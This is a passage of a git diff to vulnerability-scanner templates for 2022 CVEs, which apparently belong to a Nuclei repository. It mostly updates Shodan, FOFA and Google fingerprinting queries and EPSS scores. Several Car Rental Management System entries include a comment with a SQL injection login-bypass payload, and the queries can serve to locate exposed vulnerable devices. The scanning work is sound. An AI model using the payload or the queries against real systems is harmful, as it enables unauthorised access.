+29,9 @@ info: vendor: nagios product: nagios_xi shodan-query: http.title:"nagios xi" - fofa-query: title="nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2022,redirect,nagios,nagiosxi diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index fa1e4c5e5b..a57783ad44 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: contec product: sv-cpt-mc310_firmware - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - http.html:"solarview compact" fofa-query: body="solarview compact" tags: cve,cve2022,lfi,solarview,edb,contec diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index d334a36759..eb5f8e0a33 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -18,7 +18,7 @@ info: classification: cve-id: CVE-2022-29299 epss-score: 0.00175 - epss-percentile: 0.53704 + epss-percentile: 0.5456 metadata: verified: true max-request: 1 diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index f521195e84..4da2d1c743 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29303 cwe-id: CWE-78 - epss-score: 0.9598 - epss-percentile: 0.99429 + epss-score: 0.96471 + epss-percentile: 0.99582 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec product: sv-cpt-mc310_firmware - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - http.html:"solarview compact" fofa-query: body="solarview compact" tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec variables: diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 28da09bfa3..f8d934c551 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index d1d83d95df..8eebdf0a5e 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -29,9 +29,9 @@ info: max-request: 1 vendor: wso2 product: api_manager - google-query: inurl:"carbon/admin/login" shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve,cve2022,wso2,xss,packetstorm http: diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index ce8893b72c..60830060b2 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: ispyconnect product: ispy - shodan-query: http.html:"iSpy is running" + shodan-query: + - http.html:"iSpy is running" + - http.html:"ispy is running" fofa-query: body="ispy is running" tags: cve,cve2022,ispy,auth-bypass,ispyconnect diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 07dc5b0c16..6670d91887 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: title="wi-fi app login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,xss,wavlink,router,iot diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 70cbd9eb9d..66c94ea2a4 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-30514 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39401 + epss-score: 0.00112 + epss-percentile: 0.44481 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 2588d2fd9f..e75734e5fc 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: zyxel product: usg_flex_100w_firmware - shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" + shodan-query: + - title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" + - http.title:"usg flex 100","usg flex 100w","usg flex 200","usg flex 500","usg flex 700","usg flex 50","usg flex 50w","atp100","atp200","atp500","atp700" tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce http: diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index d0de8e9479..7f3d1c317e 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: atmail product: atmail - shodan-query: http.html:"atmail" - fofa-query: body="powered by atmail" + shodan-query: + - http.html:"atmail" + - http.html:"powered by atmail" + fofa-query: + - body="powered by atmail" + - body="atmail" tags: cve2022,cve,atmail,xss http: diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 75745cda14..907be56f20 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -29,9 +29,16 @@ info: max-request: 2 vendor: parallels product: h-sphere - shodan-query: title:"h-sphere" - fofa-query: title="h-sphere" - google-query: intitle:"h-sphere" + shodan-query: + - title:"h-sphere" + - http.title:"h-sphere" + - http.title:"parallels h-sphere" + fofa-query: + - title="h-sphere" + - title="parallels h-sphere" + google-query: + - intitle:"h-sphere" + - intitle:"parallels h-sphere" tags: cve,cve2022,parallels,hsphere,xss http: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index a0d248be53..f32fde29ab 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: roxy-wi product: roxy-wi - shodan-query: http.html:"Roxy-WI" + shodan-query: + - http.html:"Roxy-WI" + - http.html:"roxy-wi" fofa-query: body="roxy-wi" tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 3df8c7c7fe..c325cd95bd 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: gitblit product: gitblit - shodan-query: http.html:"Gitblit" - fofa-query: title="gitblit" + shodan-query: + - http.html:"Gitblit" + - http.title:"gitblit" + - http.html:"gitblit" + fofa-query: + - title="gitblit" + - body="gitblit" google-query: intitle:"gitblit" tags: cve,cve2022,lfi,gitblit diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 84f1d81054..aa7356f532 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware - shodan-query: http.title:"Linear eMerge" - fofa-query: title="emerge" - google-query: intitle:"linear emerge" + shodan-query: + - http.title:"Linear eMerge" + - http.title:"emerge" + - http.title:"linear emerge" + fofa-query: + - title="emerge" + - title="linear emerge" + google-query: + - intitle:"linear emerge" + - intitle:"emerge" tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 8590a9e9ab..bd1a671221 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: contec product: sv-cpt-mc310_firmware - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - http.html:"solarview compact" fofa-query: body="solarview compact" tags: cve2022,cve,xss,solarview,contec diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 418d12f78e..b8848da068 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -27,9 +27,9 @@ info: vendor: basixonline product: nex-forms framework: wordpress - publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/ fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/ + publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 7ba5b1420f..cfe7c95aea 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware - shodan-query: title:"eMerge" - fofa-query: title="emerge" - google-query: intitle:"linear emerge" + shodan-query: + - title:"eMerge" + - http.title:"emerge" + - http.title:"linear emerge" + fofa-query: + - title="emerge" + - title="linear emerge" + google-query: + - intitle:"linear emerge" + - intitle:"emerge" tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 868f59a5de..8b4060b4cc 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -30,7 +30,9 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 - fofa-query: icon_hash=-1250474341 + fofa-query: + - icon_hash=-1250474341 + - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" tags: cve2022,cve,vmware,lfi http: diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 7d4a8910b2..253a56f51d 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware - shodan-query: http.title:"eMerge" - fofa-query: title="emerge" - google-query: intitle:"linear emerge" + shodan-query: + - http.title:"eMerge" + - http.title:"emerge" + - http.title:"linear emerge" + fofa-query: + - title="emerge" + - title="linear emerge" + google-query: + - intitle:"linear emerge" + - intitle:"emerge" tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index a052ca9bf8..b5c4e81f6b 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 0558a8bf2d..28f531ace1 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -22,15 +22,20 @@ info: cve-id: CVE-2022-31846 cwe-id: CWE-668 epss-score: 0.00874 - epss-percentile: 0.80651 + epss-percentile: 0.82407 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index de254b0f4b..e95aa4986b 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wavlink product: wn579x3_firmware - shodan-query: http.html:"Wavlink" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" fofa-query: body="wavlink" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 6bd1441b08..7dfd667168 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 725eae45a2..c3ecce8914 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -26,9 +26,11 @@ info: max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 4783617bb6..6bed7f833a 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -19,17 +19,19 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32025 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 1bebc48cda..ec1d320723 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -28,9 +28,11 @@ info: max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index ce53554b2b..5f5b25ea43 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -19,17 +19,19 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 49fc8166af..e834ab4ce1 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: hospital_management_system_project product: hospital_management_system - shodan-query: http.html:"Hospital Management System" + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index c56b304eae..1bd2ead43b 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -29,9 +29,11 @@ info: max-request: 1 vendor: edx product: open_edx - shodan-query: http.html:"Open edX" - comment: Hover the cursor on the redirect link + shodan-query: + - http.html:"Open edX" + - http.html:"open edx" fofa-query: body="open edx" + comment: Hover the cursor on the redirect link tags: cve,cve2022,openedx,xss,edx http: diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index 89c31aba06..bd9478e720 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -24,8 +24,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml index e4572dee99..20d0ac1a2d 100644 --- a/http/cves/2022/CVE-2022-32430.yaml +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -22,9 +22,9 @@ info: max-request: 1 vendor: talelin product: lin-cms-spring-boot - fofa-query: body="心上无垢,林间有风" shodan-query: http.html:"心上无垢,林间有风" - tags: cve,cve2022,lin-cms,auth-bypass + fofa-query: body="心上无垢,林间有风" + tags: cve,cve2022,lin-cms,auth-bypass,talelin http: - method: GET diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index ebdfe2a0f5..d9e30e234b 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wwbn product: avideo - shodan-query: http.html:"AVideo" + shodan-query: + - http.html:"AVideo" + - http.html:"avideo" fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 68c57598c7..e34eb71e32 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wwbn product: avideo - shodan-query: http.html:"AVideo" + shodan-query: + - http.html:"AVideo" + - http.html:"avideo" fofa-query: body="avideo" tags: cve,cve2022,avideo,xss,wwbn diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index bb8f14fa40..f2a5f4451f 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wwbn product: avideo - shodan-query: http.html:"AVideo" + shodan-query: + - http.html:"AVideo" + - http.html:"avideo" fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index 1938b73c11..9686cb9d55 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: nuuo product: nvrsolo_firmware - shodan-query: http.html:"NVRsolo" + shodan-query: + - http.html:"NVRsolo" + - http.html:"nvrsolo" fofa-query: body="nvrsolo" tags: cve,cve2022,nvrsolo,xss,nuuo diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 5b8abf2e39..46ee6d8bb3 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -21,15 +21,17 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33174 cwe-id: CWE-863 - epss-score: 0.01241 - epss-percentile: 0.85189 + epss-score: 0.01207 + epss-percentile: 0.85196 cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: powertekpdus product: basic_pdu_firmware - shodan-query: http.html:"Powertek" + shodan-query: + - http.html:"Powertek" + - http.html:"powertek" fofa-query: body="powertek" tags: cve2022,cve,powertek,auth-bypass,powertekpdus diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 6e5153487e..e8b344a378 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: apache product: spark - shodan-query: title:"Spark Master at" - fofa-query: body="/apps/imt/html/" + shodan-query: + - title:"Spark Master at" + - http.html:"/apps/imt/html/" + - http.title:"spark master at" + fofa-query: + - body="/apps/imt/html/" + - title="spark master at" google-query: intitle:"spark master at" tags: cve2022,cve,apache,spark,kev,packetstorm variables: diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 5d27da4da4..91801a78bb 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -30,9 +30,9 @@ info: vendor: plugins-market product: wp_visitor_statistics framework: wordpress - google-query: inurl:"/wp-content/plugins/wp-stats-manager" - fofa-query: body="wp-stats-manager" shodan-query: http.html:"wp-stats-manager" + fofa-query: body="wp-stats-manager" + google-query: inurl:"/wp-content/plugins/wp-stats-manager" tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market http: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 435486fe0c..ec1aa1be8f 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware - shodan-query: http.html:"WN530HG4" - fofa-query: body="wn530hg4" + shodan-query: + - http.html:"WN530HG4" + - http.html:"wn530hg4" + - http.title:"wi-fi app login" + fofa-query: + - body="wn530hg4" + - title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 7ac287b4bc..1fa1d06f36 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wn533a8_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: title="wi-fi app login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,packetstorm,wavlink,router,exposure diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 9afab472eb..ca676d0519 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: body="wn530hg4" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wn530hg4" + - http.title:"wi-fi app login" + fofa-query: + - body="wn530hg4" + - title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure,packetstorm diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 22243be7e6..235ddce6d1 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wn533a8_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve2022,cve,wavlink,xss,router,edb diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index d6ab2d2988..b0407b382c 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -21,16 +21,21 @@ info: cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 - epss-score: 0.17111 - epss-percentile: 0.95601 + epss-score: 0.16814 + epss-percentile: 0.9604 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: body="wn530hg4" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wn530hg4" + - http.title:"wi-fi app login" + fofa-query: + - body="wn530hg4" + - title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 8059932da0..3532ec42c2 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -29,9 +29,14 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.html:"PMB Group" - fofa-query: body="pmb group" - tags: cve,cve2022,pmb,xss,pmb_project + shodan-query: + - http.html:"PMB Group" + - http.html:"pmb group" + - http.favicon.hash:1469328760 + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve,cve2022,pmb,xss,pmb_project,sigb http: - method: GET diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index d997949422..21b69f6044 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -22,7 +22,9 @@ info: max-request: 1 vendor: dw product: spectrum_server_firmware - shodan-query: http.favicon.hash:868509217 + shodan-query: + - http.favicon.hash:868509217 + - http.favicon.hash:"868509217" fofa-query: icon_hash="868509217" tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index e6174ed181..5728c1efde 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index b69e643396..f90d9f91c6 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -29,7 